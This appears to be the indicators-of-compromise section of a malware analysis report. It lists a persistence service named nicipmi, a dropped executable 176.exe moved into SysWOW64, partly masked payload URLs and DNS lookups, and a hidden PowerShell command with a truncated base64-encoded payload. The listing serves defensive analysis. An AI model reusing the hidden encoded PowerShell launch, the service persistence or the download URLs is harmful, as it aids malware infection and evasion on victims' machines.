Technical information
- [<HKLM>\System\CurrentControlSet\Services\nicipmi] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\nicipmi] 'ImagePath' = '"%WINDIR%\SysWOW64\nicipmi.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABPAG0AaQByAHYAbwBtAHAAcABjAGwAYQBpAD0AJwBQAGwAdQBqAGEAbQBqAGoAeQBqAHAAJwA7ACQASQBjAHkAeABvAHAAZgBpAHoAZgBrAHoAYwAgAD0AIAAnADEANwA2ACcAOwAkAEcAdwBpAG0AawBmAHgAbwA9ACcASgB2AG4AagB...
- %HOMEPATH%\176.exe
- %HOMEPATH%\176.exe to %WINDIR%\syswow64\nicipmi.exe
- http://vi##sa.com/administrator/OMM4w/
- http://co###izate.com/Sitio_web/8PzLe0/
- http://19#.#7.44.48/1vcy1X1Mh8pSBydSbL
- DNS ASK de##.#oolatech.com
- DNS ASK vi##sa.com
- DNS ASK sn####lthmedico.com
- DNS ASK co###izate.com
- '%HOMEPATH%\176.exe'
- '%WINDIR%\syswow64\nicipmi.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABPAG0AaQByAHYAbwBtAHAAcABjAGwAYQBpAD0AJwBQAGwAdQBqAGEAbQBqAGoAeQBqAHAAJwA7ACQASQBjAHkAeABvAHAAZgBpAHoAZgBrAHoAYwAgAD0AIAAnADEANwA2ACcAOwAkAEcAdwBpAG0AawBmAHgAbwA9ACcASgB2AG4AagB...' (with a hidden window)